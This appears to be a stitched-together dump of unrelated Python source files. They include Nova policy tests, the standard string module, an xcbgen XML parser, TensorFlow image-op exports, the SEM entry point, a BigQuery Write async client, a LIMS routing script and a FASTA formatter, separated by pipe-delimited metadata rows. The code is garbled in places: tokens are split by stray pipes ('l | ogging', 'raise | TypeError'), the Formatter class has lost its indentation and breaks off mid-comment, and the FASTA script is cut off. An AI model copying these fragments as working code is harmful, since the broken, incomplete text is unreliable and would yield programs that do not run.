from nova.compute import vm_states
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit import fake_instance
from nova.tests.unit.policies import base
class AdminActionsPolicyTest(base.BasePolicyTest):
    """Test Admin Actions APIs policies with all possible context.

    This class defines the set of context with different roles
    which are allowed and not allowed to pass the policy checks.
    With those set of context, it will call the API operation and
    verify the expected behaviour.
    """

    def setUp(self):
        super(AdminActionsPolicyTest, self).setUp()
        self.controller = admin_actions.AdminActionsController()
        self.req = fakes.HTTPRequest.blank('')
        self.mock_get = self.useFixture(
            fixtures.MockPatch('nova.compute.api.API.get')).mock
        uuid = uuids.fake_id
        self.instance = fake_instance.fake_instance_obj(
            self.project_member_context,
            id=1, uuid=uuid, vm_state=vm_states.ACTIVE,
            task_state=None, launched_at=timeutils.utcnow())
        self.mock_get.return_value = self.instance
        # Contexts that are allowed to perform the admin actions.
        # (Original comments said "change the service" -- a copy-paste
        # from the services tests.)
        self.admin_authorized_contexts = [
            self.legacy_admin_context, self.system_admin_context,
            self.project_admin_context]
        # Contexts that must be rejected by the policy checks.
        self.admin_unauthorized_contexts = [
            self.system_member_context, self.system_reader_context,
            self.system_foo_context, self.project_member_context,
            self.other_project_member_context,
            self.project_foo_context, self.project_reader_context
        ]

    @mock.patch('nova.objects.Instance.save')
    def test_reset_state_policy(self, mock_save):
        rule_name = "os_compute_api:os-admin-actions:reset_state"
        # Repaired a token garbled in the source on the call below.
        self.common_policy_check(self.admin_authorized_contexts,
                                 self.admin_unauthorized_contexts,
                                 rule_name, self.controller._reset_state,
                                 self.req, self.instance.uuid,
                                 body={'os-resetState': {'state': 'active'}})

    def test_inject_network_info_policy(self):
        # Repaired the rule-name string garbled in the source.
        rule_name = "os_compute_api:os-admin-actions:inject_network_info"
        with mock.patch.object(self.controller.compute_api,
                               "inject_network_info"):
            self.common_policy_check(self.admin_authorized_contexts,
                                     self.admin_unauthorized_contexts,
                                     rule_name,
                                     self.controller._inject_network_info,
                                     self.req, self.instance.uuid, body={})

    def test_reset_network_policy(self):
        rule_name = "os_compute_api:os-admin-actions:reset_network"
        with mock.patch.object(self.controller.compute_api, "reset_network"):
            self.common_policy_check(self.admin_authorized_contexts,
                                     self.admin_unauthorized_contexts,
                                     rule_name, self.controller._reset_network,
                                     self.req, self.instance.uuid, body={})
class AdminActionsScopeTypePolicyTest(AdminActionsPolicyTest):
    """Test Admin Actions APIs policies with system scope enabled.
    This class set the nova.conf [oslo_policy] enforce_scope to True
    so that we can switch on the scope checking on oslo policy side.
    It defines the set of context with scopped token
    which are allowed and not allowed to pass the policy checks.
    With those set of context, it will run the API operation and
    verify the expected behaviour.
    """
    def setUp(self):
        super(AdminActionsScopeTypePolicyTest, self).setUp()
        # With scope enforcement on, only system-scoped admin tokens pass.
        self.flags(enforce_scope=True, group="oslo_policy")
        # Check that system admin is able to perform the system level actions
        # on server.
        self.admin_authorized_contexts = [
            self.system_admin_context]
        # Check that non-system or non-admin is not able to perform the system
        # level actions on server.
        self.admin_unauthorized_contexts = [
            self.legacy_admin_context, self.system_member_context,
            self.system_reader_context, self.system_foo_context,
            self.project_admin_context, self.project_member_context,
            self.other_project_member_context,
            self.project_foo_context, self.project_reader_context
        ]
|
jameswatt2008/jameswatt2008.github.io | python/Python核心编程/网络编程/截图和代码/概述、SOCKET/多进程copy文件/test/string.py | Python | gpl-2.0 | 11,854 | 0.00194 | """A collection of string constants.
Public module variables:
whitespace -- a string containing all ASCII whitespace
ascii_lowercase -- a string containing all ASCII lowercase letters
ascii_uppercase -- a string containing all ASCII uppercase letters
ascii_letters -- a string containing all ASCII letters
digits -- a string containing all ASCII decimal digits
hexdigits -- a string containing all ASCII hexadecimal digits
octdigits -- a string containing all ASCII octal digits
punctuation -- a string containing all ASCII punctuation characters
printable -- a string containing all ASCII characters considered printable
"""
__all__ = ["ascii_letters", "ascii_lowercase", "ascii_uppercase", "capwords",
"digits", "hexdigits", "octdigits", "printable", "punctuation",
"whitespace", "Formatter", "Template"]
import _string
# Some strings for ctype-style character classification
whitespace = ' \t\n\r\v\f'
ascii_lowercase = 'abcdefghijklmnopqrstuvwxyz'
ascii_uppercase = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
ascii_letters = ascii_lowercase + ascii_uppercase
digits = '0123456789'
hexdigits = digits + 'abcdef' + 'ABCDEF'
octdigits = '01234567'
punctuation = """!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"""
printable = digits + ascii_letters + punctuation + whitespace
# Functions which aren't available as string methods.
# Capitalize the words in a string, e.g. " aBc dEf " -> "Abc Def".
def capwords(s, sep=None):
    """Capitalize each word of *s* and rejoin the words with *sep*.

    With sep absent or None, words are split on runs of whitespace and
    rejoined with single spaces, which also strips leading and trailing
    whitespace; otherwise sep is used both to split and to join.
    """
    joiner = sep or ' '
    words = [word.capitalize() for word in s.split(sep)]
    return joiner.join(words)
####################################################################
import re as _re
from collections import ChainMap as _ChainMap
class _TemplateMetaclass(type):
    # Builds Template.pattern at class-creation time: subclasses may
    # override 'delimiter'/'idpattern' (or supply a full 'pattern') and
    # automatically get a matching compiled regex.
    pattern = r"""
    %(delim)s(?:
      (?P<escaped>%(delim)s) | # Escape sequence of two delimiters
      (?P<named>%(id)s)      | # delimiter and a Python identifier
      {(?P<braced>%(id)s)}   | # delimiter and a braced identifier
      (?P<invalid>)            # Other ill-formed delimiter exprs
    )
    """
    def __init__(cls, name, bases, dct):
        super(_TemplateMetaclass, cls).__init__(name, bases, dct)
        if 'pattern' in dct:
            # The subclass provided an explicit pattern; use it verbatim.
            pattern = cls.pattern
        else:
            pattern = _TemplateMetaclass.pattern % {
                'delim' : _re.escape(cls.delimiter),
                'id' : cls.idpattern,
                }
        cls.pattern = _re.compile(pattern, cls.flags | _re.VERBOSE)
class Template(metaclass=_TemplateMetaclass):
    """A string class for supporting $-substitutions."""
    delimiter = '$'
    idpattern = r'[_a-z][_a-z0-9]*'
    flags = _re.IGNORECASE
    def __init__(self, template):
        self.template = template
    # Search for $$, $identifier, ${identifier}, and any bare $'s
    def _invalid(self, mo):
        # Translate the offset of the bad '$' into (line, column) so the
        # error message points at the exact spot in the template.
        i = mo.start('invalid')
        lines = self.template[:i].splitlines(keepends=True)
        if not lines:
            colno = 1
            lineno = 1
        else:
            colno = i - len(''.join(lines[:-1]))
            lineno = len(lines)
        raise ValueError('Invalid placeholder in string: line %d, col %d' %
                         (lineno, colno))
    def substitute(*args, **kws):
        """Substitute placeholders; raise on missing or invalid ones."""
        # 'self' is taken positionally so a mapping may legitimately
        # contain a 'self' key passed via **kws.
        if not args:
            raise TypeError("descriptor 'substitute' of 'Template' object "
                            "needs an argument")
        self, *args = args  # allow the "self" keyword be passed
        if len(args) > 1:
            raise TypeError('Too many positional arguments')
        if not args:
            mapping = kws
        elif kws:
            # Keyword arguments take precedence over the mapping.
            mapping = _ChainMap(kws, args[0])
        else:
            mapping = args[0]
        # Helper function for .sub()
        def convert(mo):
            # Check the most common path first.
            named = mo.group('named') or mo.group('braced')
            if named is not None:
                val = mapping[named]
                # We use this idiom instead of str() because the latter will
                # fail if val is a Unicode containing non-ASCII characters.
                return '%s' % (val,)
            if mo.group('escaped') is not None:
                return self.delimiter
            if mo.group('invalid') is not None:
                self._invalid(mo)
            raise ValueError('Unrecognized named group in pattern',
                             self.pattern)
        return self.pattern.sub(convert, self.template)
    def safe_substitute(*args, **kws):
        """Like substitute(), but leave unknown/invalid placeholders as-is."""
        if not args:
            raise TypeError("descriptor 'safe_substitute' of 'Template' object "
                            "needs an argument")
        self, *args = args  # allow the "self" keyword be passed
        if len(args) > 1:
            raise TypeError('Too many positional arguments')
        if not args:
            mapping = kws
        elif kws:
            mapping = _ChainMap(kws, args[0])
        else:
            mapping = args[0]
        # Helper function for .sub()
        def convert(mo):
            named = mo.group('named') or mo.group('braced')
            if named is not None:
                try:
                    # We use this idiom instead of str() because the latter
                    # will fail if val is a Unicode containing non-ASCII
                    return '%s' % (mapping[named],)
                except KeyError:
                    # Unknown name: keep the original placeholder text.
                    return mo.group()
            if mo.group('escaped') is not None:
                return self.delimiter
            if mo.group('invalid') is not None:
                return mo.group()
            raise ValueError('Unrecognized named group in pattern',
                             self.pattern)
        return self.pattern.sub(convert, self.template)
########################################################################
# the Formatter class
# see PEP 3101 for details and purpose of this class
# The hard parts are reused from the C implementation. They're exposed as "_"
# prefixed methods of str.
# The overall parser is implemented in _string.formatter_parser.
# The field name parser is implemented in _string.formatter_field_name_split
class Formatter:
def format(*args, **kwargs):
if not args:
raise | TypeError("descriptor 'format' of 'Formatter' object "
"needs an argument")
self, *args = args # allow the "self" keyword be passed
try:
format_string, *args = args # allow the "format_string" keyword be passed
except ValueError:
if 'format_string' in kwargs:
format_string = kwargs.pop('format_string')
import warnings
warnings.warn("Passing 'format_string' as keyword argument is "
"deprecated", DeprecationWarning, stacklevel=2)
else:
raise TypeError("format() missing 1 required positional "
"argument: 'format_string'") from None
return self.vformat(format_string, args, kwargs)
def vformat(self, format_string, args, kwargs):
used_args = set()
result, _ = self._vformat(format_string, args, kwargs, used_args, 2)
self.check_unused_args(used_args, args, kwargs)
return result
def _vformat(self, format_string, args, kwargs, used_args, recursion_depth,
auto_arg_index=0):
if recursion_depth < 0:
raise ValueError('Max string recursion exceeded')
result = []
for literal_text, field_name, format_spec, conversion in \
self.parse(format_string):
# output the literal text
if literal_text:
result.append(literal_text)
# if there's a field, output it
if field_name is not None:
# this is some m |
OpenInkpot-archive/iplinux-xcb-proto | xcbgen/matcher.py | Python | mit | 3,534 | 0.00764 | '''
XML parser. One function for each top-level element in the schema.
Most functions just declare a new object and add it to the module.
For typedefs, eventcopies, xidtypes, and other aliases though,
we do not create a new type object, we just record the existing one under a new name.
'''
from os.path import join
from xml.etree.cElementTree import parse
import state
from xtypes import *
def import_(node, module, namespace):
    '''
    For imports, we load the file, create a new namespace object,
    execute recursively, then record the import (for header files, etc.)
    '''
    new_file = join(namespace.dir, '%s.xml' % node.text)
    # NOTE(review): new_root is parsed but never used -- state.Namespace
    # presumably re-parses new_file itself; confirm before removing.
    new_root = parse(new_file).getroot()
    new_namespace = state.Namespace(new_file)
    execute(module, new_namespace)
    # Guard against double-registration when two schemas import the same one.
    if not module.has_import(node.text):
        module.add_import(node.text, new_namespace)
def typedef(node, module, namespace):
    """Register a typedef: record the existing old type under a new name."""
    new_id = node.get('newname')
    qualified = namespace.prefix + (new_id,)
    aliased = module.get_type(node.get('oldname'))
    module.add_type(new_id, namespace.ns, qualified, aliased)
def xidtype(node, module, namespace):
    """Register an XID type; XIDs are plain CARD32 values on the wire."""
    xid_name = node.get('name')
    qualified = namespace.prefix + (xid_name,)
    card32 = module.get_type('CARD32')
    module.add_type(xid_name, namespace.ns, qualified, card32)
def xidunion(node, module, namespace):
    """Register an XID union; like plain XIDs it is recorded as a CARD32."""
    id = node.get('name')
    name = namespace.prefix + (id,)
    type = module.get_type('CARD32')
    module.add_type(id, namespace.ns, name, type)
def enum(node, module, namespace):
    """Declare a new Enum type from this node and register it."""
    id = node.get('name')
    name = namespace.prefix + (id,)
    type = Enum(name, node)
    module.add_type(id, namespace.ns, name, type)
def struct(node, module, namespace):
    """Declare a new Struct type from this node and register it."""
    id = node.get('name')
    name = namespace.prefix + (id,)
    type = Struct(name, node)
    module.add_type(id, namespace.ns, name, type)
def union(node, module, namespace):
    """Declare a new Union type from this node and register it."""
    id = node.get('name')
    name = namespace.prefix + (id,)
    type = Union(name, node)
    module.add_type(id, namespace.ns, name, type)
def request(node, module, namespace):
    """Declare a new protocol Request and register it on the module."""
    id = node.get('name')
    name = namespace.prefix + (id,)
    type = Request(name, node)
    module.add_request(id, name, type)
def event(node, module, namespace):
    """Declare a new Event and register its opcode under its own name.

    (Repaired a token garbled in the source on the 'name = ...' line.)
    """
    id = node.get('name')
    name = namespace.prefix + (id,)
    event = Event(name, node)
    # True marks this as the event's canonical (non-copied) opcode.
    event.add_opcode(node.get('number'), name, True)
    module.add_event(id, name, event)
def eventcopy(node, module, namespace):
    """Alias an existing event under a new name/opcode (no new type)."""
    id = node.get('name')
    name = namespace.prefix + (id,)
    event = module.get_event(node.get('ref'))
    # False: this opcode is a copy, not the event's canonical one.
    event.add_opcode(node.get('number'), name, False)
    module.add_event(id, name, event)
def error(node, module, namespace):
    """Declare a new Error and register its opcode under its own name.

    (Repaired a token garbled in the source on the 'name = ...' line.)
    """
    id = node.get('name')
    name = namespace.prefix + (id,)
    error = Error(name, node)
    # True marks this as the error's canonical (non-copied) opcode.
    error.add_opcode(node.get('number'), name, True)
    module.add_error(id, name, error)
def errorcopy(node, module, namespace):
    """Alias an existing error under a new name/opcode (no new type)."""
    id = node.get('name')
    name = namespace.prefix + (id,)
    error = module.get_error(node.get('ref'))
    # False: this opcode is a copy, not the error's canonical one.
    error.add_opcode(node.get('number'), name, False)
    module.add_error(id, name, error)
# Dispatch table: top-level schema element tag -> handler function above.
funcs = {'import' : import_,
         'typedef' : typedef,
         'xidtype' : xidtype,
         'xidunion' : xidunion,
         'enum' : enum,
         'struct' : struct,
         'union' : union,
         'request' : request,
         'event' : event,
         'eventcopy' : eventcopy,
         'error' : error,
         'errorcopy' : errorcopy}
def execute(module, namespace):
    """Run the matching handler for every top-level element of the schema."""
    for elt in list(namespace.root):
        funcs[elt.tag](elt, module, namespace)
|
allenlavoie/tensorflow | tensorflow/python/ops/image_ops.py | Python | apache-2.0 | 2,576 | 0 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-short-docstring-punctuation
"""Image processing and decoding ops.
See the @{$python/image} guide.
@@decode_bmp
@@decode_gif
@@decode_jpeg
@@decode_and_crop_jpeg
@@encode_jpeg
@@extract_jpeg_shape
@@decode_png
@@encode_png
@@is_jpeg
@@decode_image
@@resize_images
@@resize_area
@@resize_bicubic
@@resize_bilinear
@@resize_nearest_neighbor
@@resize_image_with_crop_or_pad
@@central_crop
@@pad_to_bounding_box
@@crop_to_bounding_box
@@extract_glimpse
@@crop_and_resize
@@flip_up_down
@@random_flip_up_down
@@flip_left_right
@@random_flip_left_right
@@transpose_image
@@rot90
@@rgb_to_grayscale
@@grayscale_to_rgb
@@hsv_to_rgb
@@rgb_to_hsv
@@rgb_to_yiq
@@yiq_to_rgb
@@rgb_to_yuv
@@yuv_to_rgb
@@convert_image_dtype
@@adjust_brightness
@@random_brightness
@@adjust_contrast
@@random_contrast
@@adjust_hue
@@random_hue
@@adjust_gamma
@@adjust_saturation
@@random_saturation
@@per_image_standardization
@@draw_bounding_boxes
@@non_max_suppression
@@sample_distorted_bounding_box
@@total_variation
@@psnr
@@ssim
@@ssim_multiscale
@@image_gradients
@@sobel_edges
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.gen_image_ops import *
from tensorflow.python.ops.image_ops_impl import *
# pylint: enable=wildcard-import
# TODO(drpng): remove these once internal use has discontinued.
# pylint: disable=unused-import
from tensorflow.python.ops.image_ops_impl import _Check3DImage
from tensorflow.python.ops.image_ops_impl import _ImageDimensions
# pylint: enable=unused-import
from tensorflow.python.util.all_util import remove_undocumented
_allowed_symbols = [
# ResizeMethod is not documented, but is documented in functions
# that use it.
'ResizeMethod',
]
remove_undocumented(__name__, _allowed_symbols)
|
YoannDupont/SEM | sem/__main__.py | Python | mit | 3,899 | 0.002565 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
file: __main__.py
Description: the entry point to SEM.
author: Yoann Dupont
MIT License
Copyright (c) 2018 Yoann Dupont
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import print_function
import logging
import os.path
import unittest
import sys
import sem
import sem.modules
from sem.logger import logging_format
from sem.misc import find_suggestions
sem_logger = l | ogging.getLogger("sem")
def valid_module(m):
    """Return True when *m* names an importable SEM module file.

    Accepts ``*.py`` files, excluding private modules (leading underscore)
    and the infrastructure files sem_module.py / pipeline.py.
    """
    if not m.endswith(".py"):
        return False
    if m.startswith(u"_"):
        return False
    return m not in ["sem_module.py", "pipeline.py"]
def main(args=None):
    """SEM entry point: dispatch ``sem <module> ...`` to the right module.

    NOTE(review): *args* is accepted but never used -- the argument
    parsers below read sys.argv directly; confirm before relying on it.
    """

    def banter():
        def username():
            import os
            # Fall back to the home-directory name when neither USERNAME
            # nor USER is set. (Repaired a garbled os.environ.get call.)
            return os.environ.get("USERNAME", os.environ.get("USER", os.path.split(os.path.expanduser(u"~"))[-1]))
        import random
        l = [
            u"Do thou mockest me?",
            u"Try again?",
            u"I'm sorry {0}, I'm afraid I can't do that.".format(username()),
            u'The greatest trick this module ever pulled what convincing the users it did not exist.',
            u"It's just a typo."
        ]
        random.shuffle(l)
        return l[0]

    # Discover the runnable modules shipped in sem/modules.
    modules = {}
    for element in os.listdir(os.path.join(sem.SEM_HOME, "modules")):
        m = element[:-3]
        if valid_module(element):
            modules[m] = sem.modules.get_package(m)

    name = os.path.basename(sys.argv[0])
    # No sub-command defaults to showing the help text.
    operation = (sys.argv[1] if len(sys.argv) > 1 else "-h")

    if operation in modules:
        module = modules[operation]
        module.main(sem.argument_parser.parse_args())
    elif operation in ["-h", "--help"]:
        print("Usage: {0} <module> [module arguments]\n".format(name))
        print("Module list:")
        for module in modules:
            print("\t{0}".format(module))
        print()
        print("for SEM's current version: -v or --version\n")
        print("for informations about the last revision: -i or --informations")
        print("for playing all tests: --test")
    elif operation in ["-v", "--version"]:
        print(sem.full_name())
    elif operation in ["-i", "--informations"]:
        informations = sem.informations()
        try:
            print(informations)
        except UnicodeEncodeError:
            # Terminal encoding cannot represent the text; degrade politely.
            print(informations.encode(sys.getfilesystemencoding(), errors="replace"))
    elif operation == "--test":
        testsuite = unittest.TestLoader().discover(os.path.join(sem.SEM_HOME, "tests"))
        unittest.TextTestRunner(verbosity=2).run(testsuite)
    else:
        print("Module not found: " + operation)
        # Offer close matches for likely typos.
        suggestions = find_suggestions(operation, modules)
        if len(suggestions) > 0:
            print("Did you mean one of the following?")
            for suggestion in suggestions:
                print("\t{0}".format(suggestion))
        else:
            print("No suggestions found...", banter())
|
googleapis/python-bigquery-storage | google/cloud/bigquery_storage_v1beta2/services/big_query_write/async_client.py | Python | apache-2.0 | 35,099 | 0.001368 | # -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import functools
import re
from typing import (
Dict,
Optional,
AsyncIterable,
Awaitable,
AsyncIterator,
Sequence,
Tuple,
Type,
Union,
)
import pkg_resources
from google.api_core.client_options import ClientOptions
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.cloud.bigquery_storage_v1beta2.types import storage
from google.cloud.bigquery_storage_v1beta2.types import stream
from google.cloud.bigquery_storage_v1beta2.types import table
from google.protobuf import timestamp_pb2 # type: ignore
from google.rpc import status_pb2 # type: ignore
from .transports.base import BigQueryWriteTransport, DEFAULT_CLIENT_INFO
from .transports.grpc_asyncio import BigQueryWriteGrpcAsyncIOTransport
from .client import BigQueryWriteClient
class BigQueryWriteAsyncClient:
"""BigQuery Write API.
The Write API can be used to write data to BigQuery.
"""
_client: BigQueryWriteClient
DEFAULT_ENDPOINT = BigQueryWriteClient.DEFAULT_ENDPOINT
DEFAULT_MTLS_ENDPOINT = BigQueryWriteClient.DEFAULT_MTLS_ENDPOINT
table_path = staticmethod(BigQueryWriteClient.table_path)
parse_table_path = staticmethod(BigQueryWriteClient.parse_table_path)
write_stream_path = staticmethod(BigQueryWriteClient.write_stream_path)
parse_write_stream_path = staticmethod(BigQueryWriteClient.parse_write_stream_path)
common_billing_account_path = staticmethod(
BigQueryWriteClient.common_billing_account_path
)
parse_common_billing_account_path = staticmethod(
BigQueryWriteClient.parse_common_billing_account_path
)
common_folder_path = staticmethod(BigQueryWriteClient.common_folder_path)
parse_common_folder_path = staticmethod(
BigQueryWriteClient.parse_common_folder_path
)
common_organization_path = staticmethod(
BigQueryWriteClient.common_organization_path
)
parse_common_organization_path = staticmethod(
BigQueryWriteClient.parse_common_organization_path
)
common_project_path = staticmethod(BigQueryWriteClient.common_project_path)
parse_common_project_path = staticmethod(
BigQueryWriteClient.parse_common_project_path
)
common_location_path = staticmethod(BigQueryWriteClient.common_location_path)
parse_common_location_path = staticmethod(
BigQueryWriteClient.parse_common_location_path
)
    @classmethod
    def from_service_account_info(cls, info: dict, *args, **kwargs):
        """Creates an instance of this client using the provided credentials
        info.
        Args:
            info (dict): The service account private key info.
            args: Additional arguments to pass to the constructor.
            kwargs: Additional arguments to pass to the constructor.
        Returns:
            BigQueryWriteAsyncClient: The constructed client.
        """
        # Call the sync client's classmethod implementation via __func__ with
        # this async class substituted as ``cls`` so the factory constructs an
        # async client instead of a sync one.
        return BigQueryWriteClient.from_service_account_info.__func__(BigQueryWriteAsyncClient, info, *args, **kwargs)  # type: ignore
    @classmethod
    def from_service_account_file(cls, filename: str, *args, **kwargs):
        """Creates an instance of this client using the provided credentials
        file.
        Args:
            filename (str): The path to the service account private key json
                file.
            args: Additional arguments to pass to the constructor.
            kwargs: Additional arguments to pass to the constructor.
        Returns:
            BigQueryWriteAsyncClient: The constructed client.
        """
        # Reuse the sync client's factory with this async class as ``cls``
        # (same trick as from_service_account_info above).
        return BigQueryWriteClient.from_service_account_file.__func__(BigQueryWriteAsyncClient, filename, *args, **kwargs)  # type: ignore
    # Backwards-compatible alias kept for parity with the sync client API.
    from_service_account_json = from_service_account_file
    @classmethod
    def get_mtls_endpoint_and_cert_source(
        cls, client_options: Optional[ClientOptions] = None
    ):
        """Return the API endpoint and client cert source for mutual TLS.
        The client cert source is determined in the following order:
        (1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not "true", the
        client cert source is None.
        (2) if `client_options.client_cert_source` is provided, use the provided one; if the
        default client cert source exists, use the default one; otherwise the client cert
        source is None.
        The API endpoint is determined in the following order:
        (1) if `client_options.api_endpoint` is provided, use the provided one.
        (2) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is "always", use the
        default mTLS endpoint; if the environment variable is "never", use the default API
        endpoint; otherwise if client cert source exists, use the default mTLS endpoint, otherwise
        use the default API endpoint.
        More details can be found at https://google.aip.dev/auth/4114.
        Args:
            client_options (google.api_core.client_options.ClientOptions): Custom options for the
                client. Only the `api_endpoint` and `client_cert_source` properties may be used
                in this method.
        Returns:
            Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the
                client cert source to use.
        Raises:
            google.auth.exceptions.MutualTLSChannelError: If any errors happen.
        """
        # All of the resolution logic lives on the sync client; delegate.
        return BigQueryWriteClient.get_mtls_endpoint_and_cert_source(client_options)  # type: ignore
    @property
    def transport(self) -> BigQueryWriteTransport:
        """Returns the transport used by the client instance.
        Returns:
            BigQueryWriteTransport: The transport used by the client instance.
        """
        return self._client.transport
    # Resolve transport classes through the sync client's metaclass helper,
    # bound so it can be called without an instance.
    get_transport_class = functools.partial(
        type(BigQueryWriteClient).get_transport_class, type(BigQueryWriteClient)
    )
def __init__(
self,
*,
credentials: ga_credentials.Credentials = None,
transport: Union[str, BigQueryWriteTransport] = "grpc_asyncio",
client_options: ClientOptions = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the big query write client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.BigQueryWriteTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (ClientOptions): Custom options for the client. It
won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can |
EdinburghGenomics/clarity_scripts | scripts/assign_workflow_finance.py | Python | mit | 719 | 0.004172 | #!/usr/bin/env python
from EPPs.common import StepEPP, get_workflow_stage
class Assign | WorkflowFinance(StepEPP):
# All samples for the artifacts in the step will be queued to finance workflow
def _run(self):
artifacts_to_route = set()
for art in self.artifacts:
sample = art.samples[0]
artifacts_to_route.add(sample.artifact)
if artifacts_to_route:
# Only route artifacts if there are any
stage = get_workflow_stage(self.lims, "Finance - Invoicing EG 1.0", "Finance - Invoice To Be Sent")
| self.lims.route_artifacts(list(artifacts_to_route), stage_uri=stage.uri)
if __name__ == "__main__":
AssignWorkflowFinance().run()
|
tkchafin/scripts | fastaFormatter.py | Python | gpl-3.0 | 3,828 | 0.049373 | #!/usr/bin/python
import sys
import os
import getopt
from textwrap import wrap
def main():
    """Entry point: convert a FASTA file between one-line and multi-line
    layouts.

    ``--many2one`` rewrites each record's sequence on a single line;
    ``--one2many`` wraps sequences at ``--width`` characters per line.
    The two original branches were identical except for the wrap width, so
    they are collapsed into one code path here.
    """
    params = parseArgs()
    # Pick the input file and line width (width=None => one-line records).
    # --many2one takes precedence when both are given, as before.
    if params.many2one:
        infile, width = params.many2one, None
    elif params.one2many:
        infile, width = params.one2many, params.width
    else:
        # parseArgs() exits via display_help() when neither option is given,
        # so this branch is unreachable in practice.
        return
    # Later records with a duplicate header overwrite earlier ones, matching
    # the original dict-loading behaviour.
    seqs = {name: seq for name, seq in read_fasta(infile)}
    write_fasta(params.out, seqs, width)
#Function to write fasta-formatted sequences
def write_fasta(f, aln, width=None):
    """Write the alignment *aln* ({name: sequence}) to path *f* in FASTA.

    :param f: output file path
    :param aln: mapping of record name -> sequence string
    :param width: characters per sequence line; None writes one line per
        record

    Exits the process with status 1 on any I/O failure.
    """
    try:
        # ``with`` closes the handle on every path, so no explicit close()
        # is needed. Wrapping open() in the try also catches open errors,
        # which the original let escape as a traceback.
        with open(f, 'w') as fh:
            for samp in aln.keys():
                if width:
                    ol = ">" + str(samp) + "\n"
                    chunks = wrap(aln[samp], width=width,
                                  break_on_hyphens=False,
                                  drop_whitespace=False)
                    for chunk in chunks:
                        ol = ol + str(chunk) + "\n"
                else:
                    ol = ">" + str(samp) + "\n" + str(aln[samp]) + "\n"
                fh.write(ol)
    except IOError as e:
        # BUG FIX: the original message claimed the file could not be *read*.
        print("Could not write file %s: %s" % (f, e))
        sys.exit(1)
    except Exception as e:
        print("Unexpected error writing file %s: %s" % (f, e))
        sys.exit(1)
#Read samples as FASTA. Generator function
def read_fasta(fas):
    """Yield ``[name, sequence]`` pairs from the FASTA file *fas*.

    The record name is the first whitespace-delimited token of the header
    line with the leading '>' stripped; sequence lines are concatenated.

    :param fas: path to the FASTA file
    :raises FileNotFoundError: when the path does not exist (raised on
        first iteration, since this is a generator)
    """
    if not os.path.exists(fas):
        raise FileNotFoundError("File %s not found!" % fas)
    try:
        # ``with`` closes the handle on all paths; the original's
        # ``finally: fh.close()`` was redundant.
        with open(fas, 'r') as fh:
            contig = ""
            seq = ""
            for line in fh:
                line = line.strip()
                if not line:
                    continue
                if line[0] == ">":  # Found a header line
                    # Emit the previous record, then start a new one.
                    if contig:
                        yield [contig, seq]
                        seq = ""
                    contig = line.split()[0].replace(">", "")
                else:
                    seq += line
            # Yield the last record, if it has both a header and sequence.
            if contig and seq:
                yield [contig, seq]
    except IOError:
        print("Could not read file ", fas)
        sys.exit(1)
#Object to parse command-line arguments
class parseArgs():
    """Parse sys.argv with getopt and expose the options as attributes:
    ``one2many``, ``many2one``, ``width``, ``out``."""
    def __init__(self):
        #Define options
        try:
            # NOTE: ``remainder`` (non-option arguments) is ignored.
            options, remainder = getopt.getopt(sys.argv[1:], 'h1:M:w:o:', \
            ["help", "one2many=","many2one=","width=","out="])
        except getopt.GetoptError as err:
            print(err)
            self.display_help("\nExiting because getopt returned non-zero exit status.")
        #Default values for params
        #Input params
        self.one2many=None
        self.many2one=None
        self.width=60
        self.out="out.fas"
